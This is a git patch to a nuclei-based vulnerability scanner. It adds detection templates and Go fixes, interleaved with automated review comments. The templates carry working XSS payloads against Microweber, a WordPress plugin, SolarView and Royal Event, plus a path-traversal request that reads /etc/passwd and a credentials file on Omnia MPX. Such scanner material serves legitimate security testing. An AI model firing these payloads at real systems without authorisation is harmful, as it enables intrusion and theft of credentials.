From b5403161b9f38f788563e33985173046cf9cd6b5 Mon Sep 17 00:00:00 2001 
From: hktalent <18223385+hktalent@users.noreply.github.com> Date: Thu, 4 Aug 2022 10:16:23 +0800 Subject: [PATCH] =?UTF-8?q?1=E3=80=81up=20PoCs=202=E3=80=81fixed=20filefuz?= =?UTF-8?q?z=20TestIs404=20bug=203=E3=80=81fixed=20nuclei=20hang=20bug=20?= =?UTF-8?q?=202022-08-04?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- config/nuclei-templates/.new-additions | 101 +++++++----------- .../cves/2022/CVE-2022-0921.yaml | 2 +- .../cves/2022/CVE-2022-0954.yaml | 57 ++++++++++ .../cves/2022/CVE-2022-1906.yaml | 39 +++++++ .../dns/cname-service-detection.yaml | 40 ------- .../exposed-panels/jamf-setup-assistant.yaml | 25 +++++ .../exposures/configs/symfony-profiler.yaml | 12 ++- .../misconfiguration/symfony-debug.yaml | 35 ++++++ .../jira/jira-service-desk-signup.yaml | 23 ---- .../vulnerabilities/other/omnia-mpx-lfi.yaml | 35 ++++++ .../other/solarview-compact-xss.yaml | 33 ++++++ .../royalevent/royalevent-management-xss.yaml | 72 +++++++++++++ .../royalevent/royalevent-stored-xss.yaml | 32 ++++++ lib/util/config.go | 23 ++-- lib/util/db.go | 5 + lib/util/kvDb.go | 1 + .../nuclei_Yaml/nclruner/runner/runner.go | 61 +++++------ projectdiscovery/nuclei_Yaml/nuclei_yaml.go | 16 +-- .../nuclei/v2/pkg/protocols/http/request.go | 4 +- 19 files changed, 441 insertions(+), 175 deletions(-) create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-0954.yaml create mode 100644 config/nuclei-templates/cves/2022/CVE-2022-1906.yaml delete mode 100644 config/nuclei-templates/dns/cname-service-detection.yaml create mode 100644 config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml create mode 100644 config/nuclei-templates/misconfiguration/symfony-debug.yaml delete mode 100644 config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml create mode 100644 config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml create mode 100644 config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml 
create mode 100644 config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml create mode 100644 config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml diff --git a/config/nuclei-templates/.new-additions b/config/nuclei-templates/.new-additions index 53c5ed1c7..0114a9a66 100644 --- a/config/nuclei-templates/.new-additions +++ b/config/nuclei-templates/.new-additions 
@@ -1,61 +1,40 @@ -cves/2015/CVE-2015-4666.yaml -cves/2018/CVE-2018-1000856.yaml -cves/2018/CVE-2018-19136.yaml -cves/2018/CVE-2018-19137.yaml -cves/2018/CVE-2018-19751.yaml -cves/2018/CVE-2018-19752.yaml -cves/2018/CVE-2018-19892.yaml -cves/2019/CVE-2019-9922.yaml -cves/2021/CVE-2021-36450.yaml -cves/2022/CVE-2022-0656.yaml -cves/2022/CVE-2022-35416.yaml -exposed-panels/claris-filemaker-webdirect.yaml -exposed-panels/honeywell-xl-web-controller.yaml -exposed-panels/icewarp-panel-detect.yaml -exposed-panels/kafka-manager-panel.yaml -exposed-panels/noescape-login.yaml -exposed-panels/rustici-content-controller.yaml -exposed-panels/smartping-dashboard.yaml -exposed-panels/sonicwall-analyzer-login.yaml -exposed-panels/tembosocial-panel.yaml -exposed-panels/tenda-web-master.yaml -exposed-panels/tiny-file-manager.yaml -exposed-panels/veeam-backup-gcp.yaml -exposed-panels/vmware-carbon-black-edr.yaml -exposed-panels/vmware-cloud-availability.yaml -exposed-panels/vmware-cloud-director.yaml -exposed-panels/vmware-ftp-server.yaml -exposed-panels/vmware-horizon-daas.yaml -exposed-panels/vmware-vcenter-converter-standalone.yaml -exposed-panels/vmware-vcloud-director.yaml -exposed-panels/web-file-manager.yaml -exposures/configs/config-rb.yaml -exposures/configs/gcloud-config-default.yaml -exposures/configs/phpstan-config.yaml -exposures/configs/wgetrc-config.yaml -exposures/files/composer-auth-json.yaml -exposures/files/credentials-json.yaml -exposures/files/environment-rb.yaml -exposures/files/gcloud-access-token.yaml -exposures/files/gcloud-credentials.yaml -exposures/files/get-access-token-json.yaml -exposures/files/google-api-private-key.yaml -exposures/files/google-services-json.yaml -exposures/files/jsapi-ticket-json.yaml -exposures/files/npm-cli-metrics-json.yaml -exposures/files/oauth-credentials-json.yaml -exposures/files/secret-token-rb.yaml -exposures/files/service-account-credentials.yaml -exposures/files/symfony-properties-ini.yaml 
-exposures/files/token-info-json.yaml -exposures/files/token-json.yaml -exposures/files/wget-hsts-list-exposure.yaml -exposures/files/ws-ftp-ini.yaml -exposures/logs/event-debug-server-status.yaml -exposures/logs/git-logs-exposure.yaml -technologies/default-page-azure-container.yaml -technologies/default-parallels-plesk.yaml -technologies/json-server.yaml -technologies/samsung-smarttv-debug.yaml -vulnerabilities/other/opennms-log4j-jndi-rce.yaml -vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +cves/2018/CVE-2018-1000671.yaml +cves/2020/CVE-2020-13405.yaml +cves/2020/CVE-2020-9043.yaml +cves/2022/CVE-2022-0870.yaml +cves/2022/CVE-2022-0921.yaml +cves/2022/CVE-2022-0952.yaml +cves/2022/CVE-2022-0963.yaml +cves/2022/CVE-2022-1386.yaml +cves/2022/CVE-2022-1937.yaml +cves/2022/CVE-2022-2486.yaml +cves/2022/CVE-2022-2487.yaml +cves/2022/CVE-2022-2488.yaml +cves/2022/CVE-2022-30073.yaml +cves/2022/CVE-2022-34049.yaml +exposed-panels/goanywhere-mft-login.yaml +exposed-panels/mailwatch-login.yaml +exposed-panels/scriptcase/scriptcase-panel.yaml +exposed-panels/scriptcase/scriptcase-prod-login.yaml +exposures/apis/drupal-jsonapi-user-listing.yaml +misconfiguration/springboot/springboot-caches.yaml +misconfiguration/springboot/springboot-flyway.yaml +misconfiguration/springboot/springboot-scheduledtasks.yaml +technologies/nextcloud-owncloud-detect.yaml +token-spray/api-clickup.yaml +token-spray/api-clockify.yaml +token-spray/api-cloudconvert.yaml +token-spray/api-codestats.yaml +token-spray/api-craftmypdf.yaml +token-spray/api-flowdash.yaml +token-spray/api-html2pdf.yaml +token-spray/api-monday.yaml +token-spray/api-pdflayer.yaml +vulnerabilities/backdoor/jexboss-backdoor.yaml +vulnerabilities/jira/jira-servicedesk-signup.yaml +vulnerabilities/other/cvms-sqli.yaml +vulnerabilities/other/loancms-sqli.yaml +vulnerabilities/other/weiphp-sql-injection.yaml +vulnerabilities/other/zms-sqli.yaml +vulnerabilities/other/zzcms-xss.yaml 
+vulnerabilities/wordpress/analytify-plugin-xss.yaml diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml index cd4e13baa..ec2424bea 100644 --- a/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml +++ b/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 metadata: - verified: "true" + verified: true tags: cve,cve2022,xss,microweber requests: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml new file mode 100644 index 000000000..cd4e13baa --- /dev/null +++ b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml 
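Review bot: The context of this hunk shows `cve-id: CVE-2022-0954` inside `cves/2022/CVE-2022-0921.yaml`, and the diffstat creates `CVE-2022-0954.yaml` from the same blob (`cd4e13baa`), so after this commit the 0921 file is a misnamed duplicate of the 0954 template and both are loaded and run as separate templates. The quoting fix `verified: true` is applied only to the duplicate; the new `CVE-2022-0954.yaml` hunk below still carries `verified: "true"`. Either replace `CVE-2022-0921.yaml` with the template for that CVE or drop it, and change the new file's metadata line to `verified: true` as well.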
@@ -0,0 +1,57 @@ +id: CVE-2022-0954 + +info: + name: Microweber - Cross-site Scripting + author: amit-jd + severity: medium + description: | + Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. + reference: + - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 + - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ + - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0954 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,microweber + +requests: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + - | + POST /api/save_option HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother + + - | + POST /module/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}/admin/view:shop/action:options + + module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B + + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2,"true")' + - contains(body_3,'\">\" placeholder=\"Use default') + - 'contains(all_headers_3,"text/html")' + - 'status_code_3==200' + condition: and 
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml new file mode 100644 index 000000000..dd5479bbf --- /dev/null +++ b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-1906 + +info: + name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting + author: random-robbie + severity: medium + description: | + The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled. + reference: + - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906 + metadata: + verified: true + google-dork: inurl:/wp-content/plugins/digiproveblog + tags: cve,cve2022,wordpress,xss,wp-plugin,wp + +requests: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "got message " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/config/nuclei-templates/dns/cname-service-detection.yaml b/config/nuclei-templates/dns/cname-service-detection.yaml deleted file mode 100644 index 4a441a0b4..000000000 --- a/config/nuclei-templates/dns/cname-service-detection.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: cname-service-detection - -info: - name: CNAME Service Detection - author: pdteam - severity: info - description: A CNAME service was detected. - reference: - - https://ns1.com/resources/cname - classification: - cwe-id: CWE-200 - tags: dns,service - -dns: - - name: "{{FQDN}}" - type: CNAME - - matchers-condition: or - matchers: - - type: word - name: zendesk - words: - - "zendesk.com" - - - type: word - name: github - words: - - "github.io" - - - type: word - name: announcekit - words: - - "cname.announcekit.app" - - - type: word - name: wix - words: - - "wixdns.net" - -# Enhanced by mp on 2022/03/13 diff --git a/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml b/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml new file mode 100644 index 000000000..ca663bdae --- /dev/null +++ b/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml @@ -0,0 +1,25 @@ +id: jamf-setup-assistant + +info: + name: Jamf Pro Setup Assistant + author: ritikchaddha + severity: info + metadata: + verified: true + shodan-query: http.html:"Jamf Pro Setup" + tags: jamf,setup,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/setupAssistant.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Jamf Pro Setup Assistant" + + - type: status + status: + - 200 diff --git a/config/nuclei-templates/exposures/configs/symfony-profiler.yaml b/config/nuclei-templates/exposures/configs/symfony-profiler.yaml index 980d14936..f02bf7c59 100644 --- a/config/nuclei-templates/exposures/configs/symfony-profiler.yaml +++ b/config/nuclei-templates/exposures/configs/symfony-profiler.yaml 
@@ -4,16 +4,20 @@ info: name: Symfony Profiler author: pdteam severity: high + metadata: + verified: true + shodan-query: http.html:"symfony Profiler" tags: config,exposure,symfony requests: - method: GET path: - "{{BaseURL}}/_profiler/empty/search/results?limit=10" + - "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10" + + stop-at-first-match: true matchers: - type: word - words: - - "Symfony Profiler" - - "symfony/profiler/" - condition: and part: body + words: + - "Symfony Profiler" diff --git a/config/nuclei-templates/misconfiguration/symfony-debug.yaml b/config/nuclei-templates/misconfiguration/symfony-debug.yaml new file mode 100644 index 000000000..bdc1ec3bf --- /dev/null +++ b/config/nuclei-templates/misconfiguration/symfony-debug.yaml @@ -0,0 +1,35 @@ +id: symfony-debug + +info: + name: Symfony Debug Mode + author: organiccrap,pdteam + severity: high + description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code. + reference: + - https://github.com/synacktiv/eos + metadata: + verified: true + shodan-query: http.html:"symfony Profiler" + tags: symfony,debug + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'x-debug-token-link:' + - '/_profiler/' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'debug mode is enabled.' + +# Enhanced by mp on 2022/04/12 diff --git a/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml b/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml deleted file mode 100644 index 1cfce39b4..000000000 --- a/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: jira-service-desk-signup - -info: - name: Jira Service Desk Signup - author: TechbrunchFR - severity: medium - tags: jira,atlassian,service - -requests: - - method: POST - path: - - "{{BaseURL}}/servicedesk/customer/user/signup" - headers: - Content-Type: application/json - body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}' - matchers-condition: and - matchers: - - type: word - words: - - "signup.validation.errors" - - type: status - status: - - 400 diff --git a/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml new file mode 100644 index 000000000..b6c786991 --- /dev/null +++ b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml @@ -0,0 +1,35 @@ +id: omnia-mpx-lfi + +info: + name: Omnia MPX 1.5.0+r1 - Path Traversal + author: arafatansari,ritikchaddha + severity: high + description: | + Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal. + reference: + - https://www.exploit-db.com/exploits/50996 + metadata: + verified: true + shodan-query: http.html:"Omnia MPX" + tags: omnia,mpx,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" + - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: word + part: body + words: + - '"username":' + - '"password":' + - '"id":' + condition: and diff --git a/config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml b/config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml new file mode 100644 index 000000000..1ef86e157 --- /dev/null +++ b/config/nuclei-templates/vulnerabilities/other/solarview-compact-xss.yaml 
@@ -0,0 +1,33 @@ +id: solarview-compact-xss + +info: + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) + author: ritikchaddha + severity: medium + description: | + SolarView Compact v6.0 is vulnerable to cross-site scripting (XSS) vulnerability via `fname` at /Solar_Image.php. + metadata: + verified: true + shodan-query: http.html:"SolarView Compact" + tags: xss,solarview + +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="test">">' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml new file mode 100644 index 000000000..dd51cf3f6 --- /dev/null +++ b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-management-xss.yaml 
@@ -0,0 +1,72 @@ +id: royalevent-management-xss + +info: + name: Royal Event - Cross-Site Scripting(XSS) + author: ritikchaddha + severity: medium + description: | + Detects an XSS vulnerability in Royal Event System + reference: + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + metadata: + verified: true + tags: xss,authenticated,cms,royalevent + +requests: + - raw: + - | + POST /royal_event/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD + + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + + - | + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD + + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="todate" + + 2022-12-22 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="search" + + 3 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="fromdate" + + 2022-06-22 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "" + - "Report from " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml new file mode 100644 index 000000000..601e0fc7a --- /dev/null +++ b/config/nuclei-templates/vulnerabilities/royalevent/royalevent-stored-xss.yaml 
@@ -0,0 +1,32 @@ +id: royalevent-stored-xss + +info: + name: Royale Event - Stored Cross-site Scripting (Unauthenticated) + author: ritikchaddha + severity: high + description: | + Detects an XSS vulnerability in Royal Event System + reference: + - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + metadata: + verified: true + tags: xss,unauthenticated,cms,royalevent + +requests: + - raw: + - | + POST /royal_event/companyprofile.php HTTP/1.1 + Host: {{Hostname}} + + companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit= + + matchers-condition: and + matchers: + - type: word + words: + - 'value=">" >' + + - type: status + status: + - 302 diff --git a/lib/util/config.go b/lib/util/config.go index 7c0b9d92b..ff485bb15 100644 --- a/lib/util/config.go +++ b/lib/util/config.go @@ -323,6 +323,10 @@ func Init1(config *embed.FS) { log.Println("init config files is over .") } +func Mkdirs(s string) { + os.MkdirAll(s, os.ModePerm) +} + // 获取 Sha1 func GetSha1(a ...interface{}) string { h := sha1.New() @@ -377,11 +381,16 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { key := "TestIs404" + szUrl x1 := noRpt.Get(key) if nil != x1 { - a1 := x1.Value().([]interface{}) - r01 = a1[0].(*Response) - err = a1[1].(error) - ok = a1[2].(bool) - return r01, err, ok + if a1, ok := x1.Value().([]interface{}); ok { + r01 = a1[0].(*Response) + if nil == a1[1] { + err = nil + } else { + err = a1[1].(error) + } + ok = a1[2].(bool) + return r01, err, ok + } } r01, err = HttpRequset(szUrl+Abs404, "GET", "", false, nil) 
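Review bot: The POST body in `royalevent-stored-xss.yaml` contains `®no=test`, which looks like `&regno=test` whose `&reg` was decoded into the `®` character somewhere between the upstream template and this copy. If the committed file really holds `®`, the request no longer carries the `regno` form field and the `value=">" >` matcher may not behave as the template author intended; compare with the upstream nuclei-templates version of this file and restore `&regno=test` if so.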
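Review bot: `Mkdirs` in the first `config.go` hunk discards the error from `os.MkdirAll` and creates the directory with `os.ModePerm` (0777 before umask), although its new callers in `db.go` and `kvDb.go` rely on it for the SQLite file's directory and the cache directory. A mkdir failure therefore surfaces later as an unrelated open error from sqlite or the cache init. Log it where it happens and use a narrower mode unless other accounts need the data: `if err := os.MkdirAll(s, 0750); err != nil { log.Println("Mkdirs", s, err) }` — `log` is already used in this file.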
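Review bot: In the `TestIs404` hunk, the `ok` declared by `if a1, ok := x1.Value().([]interface{}); ok {` shadows the named result `ok`, so `ok = a1[2].(bool)` writes the inner variable; it works only because the return lists its values explicitly, and a later bare `return` would silently yield false. The remaining single-value assertions `a1[0].(*Response)` and `a1[2].(bool)` still panic on a malformed or short cache entry, the same failure this commit guards for `a1[1]`, and the slice length is not checked before indexing. A length check plus comma-ok assertions removes both the shadowing and the panics; `TestIs404` begins before and ends after this hunk.
```go
	if a1, isSlice := x1.Value().([]interface{}); isSlice && len(a1) == 3 {
		// comma-ok: a nil interface in any slot yields the zero value instead of panicking
		r01, _ = a1[0].(*Response)
		err, _ = a1[1].(error)
		ok, _ = a1[2].(bool)
		return r01, err, ok
	}
```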
@@ -391,13 +400,15 @@ func TestIs404(szUrl string) (r01 *Response, err error, ok bool) { } func TestIs404Page(szUrl string) (page *Page, r01 *Response, err error, ok bool) { r01, err, ok = TestIs404(szUrl) - page = &Page{Url: &szUrl} + page = &Page{Url: &szUrl, Resqonse: r01} if nil != r01 { + szTitle := "" page.Is302 = r01.StatusCode == 302 page.Is403 = r01.StatusCode == 403 page.IsBackUpPage = false page.StatusCode = r01.StatusCode page.Resqonse = r01 + page.Title = &szTitle page.BodyLen = len([]byte(r01.Body)) page.BodyStr = &r01.Body page.LocationUrl = &r01.Location diff --git a/lib/util/db.go b/lib/util/db.go index 0d8abd87e..398cf34ef 100644 --- a/lib/util/db.go +++ b/lib/util/db.go @@ -6,6 +6,7 @@ import ( "gorm.io/gorm/logger" "log" "os" + "strings" ) var dbCC *gorm.DB @@ -43,6 +44,10 @@ func GetDb(dst ...interface{}) *gorm.DB { if "" != s1 { szDf = s1 } + s1 = szDf[0:strings.LastIndex(szDf, "/")] + if "" != s1 { + Mkdirs(s1) + } log.Println("DbName ", szDf) xx01 := sqlite.Open("file:" + szDf + ".db?cache=shared&mode=rwc&_journal_mode=WAL&Synchronous=Off&temp_store=memory&mmap_size=30000000000") db, err := gorm.Open(xx01, &gorm.Config{Logger: logger.Default.LogMode(logger.Silent)}) diff --git a/lib/util/kvDb.go b/lib/util/kvDb.go index 1868afd60..a0da1ada7 100644 --- a/lib/util/kvDb.go +++ b/lib/util/kvDb.go @@ -24,6 +24,7 @@ func NewKvDbOp() *KvDbOp { if "" != s1 { CacheName11 = s1 } + Mkdirs(CacheName11) Cache1.Init(CacheName11) return Cache1 } diff --git a/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go b/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go index 123d36171..d56fa127d 100644 --- a/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go +++ b/projectdiscovery/nuclei_Yaml/nclruner/runner/runner.go 
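Review bot: In the `TestIs404Page` hunk, `Resqonse: r01` is now set in the `Page` literal, which makes the later `page.Resqonse = r01` inside the `if nil != r01` block redundant; keep one of the two. `page.Title` is only assigned when `r01` is non-nil, so on the error path it stays nil while `Url` and `Resqonse` are set — if callers dereference `Title`, move `szTitle := ""` and `page.Title = &szTitle` above the `if`. The function body continues past the end of the hunk.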
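Review bot: `s1 = szDf[0:strings.LastIndex(szDf, "/")]` in the `GetDb` hunk panics with a slice-bounds error when `szDf` contains no `/`, which the preceding override from `s1` allows (a bare database name). Guard the index before slicing: `if i := strings.LastIndex(szDf, "/"); i > 0 { Mkdirs(szDf[:i]) }`, or use `filepath.Dir(szDf)`, which also handles Windows separators but needs the `path/filepath` import in the hunk above. The same error-ignoring `Mkdirs` call is added in `kvDb.go` below.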
@@ -400,38 +400,6 @@ func (r *Runner) RunEnumeration() error { return errors.Wrap(err, "could not load templates from config") } // 确保释放资源,多实例运行优化 - defer func() { - var results *atomic.Bool - if r.options.AutomaticScan { - if results, err = r.executeSmartWorkflowInput(executerOpts, store, engine); err != nil { - return - } - - } else { - if results, err = r.executeTemplatesInput(store, engine); err != nil { - return - } - } - - if r.interactsh != nil { - matched := r.interactsh.Close() - if matched { - results.CAS(false, true) - } - } - r.progress.Stop() - - if r.issuesClient != nil { - r.issuesClient.Close() - } - - if !results.Load() { - gologger.Info().Msgf("No results found. Better luck next time!") - } - if r.browser != nil { - r.browser.Close() - } - }() if r.options.Validate { if err := store.ValidateTemplates(); err != nil { return err @@ -446,7 +414,36 @@ func (r *Runner) RunEnumeration() error { store.Load() r.displayExecutionInfo(store) + var results *atomic.Bool + if r.options.AutomaticScan { + if results, err = r.executeSmartWorkflowInput(executerOpts, store, engine); err != nil { + return err + } + + } else { + if results, err = r.executeTemplatesInput(store, engine); err != nil { + return err + } + } + if r.interactsh != nil { + matched := r.interactsh.Close() + if matched { + results.CAS(false, true) + } + } + r.progress.Stop() + + if r.issuesClient != nil { + r.issuesClient.Close() + } + + if !results.Load() { + gologger.Info().Msgf("No results found. Better luck next time!") + } + if r.browser != nil { + r.browser.Close() + } return err } diff --git a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go index cf19dced3..650fc11be 100644 --- a/projectdiscovery/nuclei_Yaml/nuclei_yaml.go +++ b/projectdiscovery/nuclei_Yaml/nuclei_yaml.go 
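Review bot: The comment `// 确保释放资源,多实例运行优化` kept at the top of the first hunk described the deferred closure this commit removes and now sits directly above `if r.options.Validate`, where it is misleading; delete it or replace it with a short English note at the cleanup. In the second hunk the new `return err` paths after `executeSmartWorkflowInput` and `executeTemplatesInput` skip `r.progress.Stop()`, `r.issuesClient.Close()` and `r.browser.Close()`, so a failed scan leaves the progress tracker, the issue client and the browser unclosed unless something outside this diff closes them. A cleanup-only `defer` registered before the scan keeps the result handling inline as the commit intends, with the three close calls at the end of the hunk then removed; `RunEnumeration` begins before the first hunk.
```go
	var results *atomic.Bool
	// cleanup only; the scan itself stays inline so a failure returns instead of running inside a defer
	defer func() {
		r.progress.Stop()
		if r.issuesClient != nil {
			r.issuesClient.Close()
		}
		if r.browser != nil {
			r.browser.Close()
		}
	}()
	// … unchanged: AutomaticScan / executeTemplatesInput branches, interactsh close, "No results" message …
	return err
```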
@@ -24,7 +24,13 @@ var ( ) // 优化,不是http协议的就不走http,提高效率 -func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) { +// 多实例运行还是存在问题,会出现nuclei 挂起的问题 +func RunNucleiP(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) { + if !util.GetValAsBool("enableNuclei") { + outNuclei <- nil + xx <- true + return + } a := strings.Split(strings.TrimSpace(buf.String()), "\n") var aHttp, noHttp []string buf.Reset() @@ -110,15 +116,11 @@ func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, o var someMapMutex = sync.RWMutex{} -func RunNucleiP(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) { +func RunNuclei(buf *bytes.Buffer, xx chan bool, oOpts *map[string]interface{}, outNuclei chan<- *runner2.Runner) { options := &types.Options{} defer func() { xx <- true }() - if !util.GetValAsBool("enableNuclei") { - outNuclei <- nil - return - } // json 控制参数 options = util.ParseOption[types.Options]("nuclei", options) if err := runner2.ConfigureOptions(); err != nil { @@ -408,7 +410,7 @@ func readConfig(options *types.Options) { options.UpdateTemplates = false options.TemplatesDirectory = pwd + "/config/nuclei-templates" // 嵌入式集成私人版本nuclei-templates 共3744个YAML POC - if "true" == util.GetVal("enablEmbedYaml") { + if util.GetValAsBool("enablEmbedYaml") { options.Templates = []string{pwd + "/config/nuclei-templates"} options.NoUpdateTemplates = true } else { diff --git a/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go b/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go index 007c4dfea..5d981d1de 100644 --- a/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go +++ b/vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go 
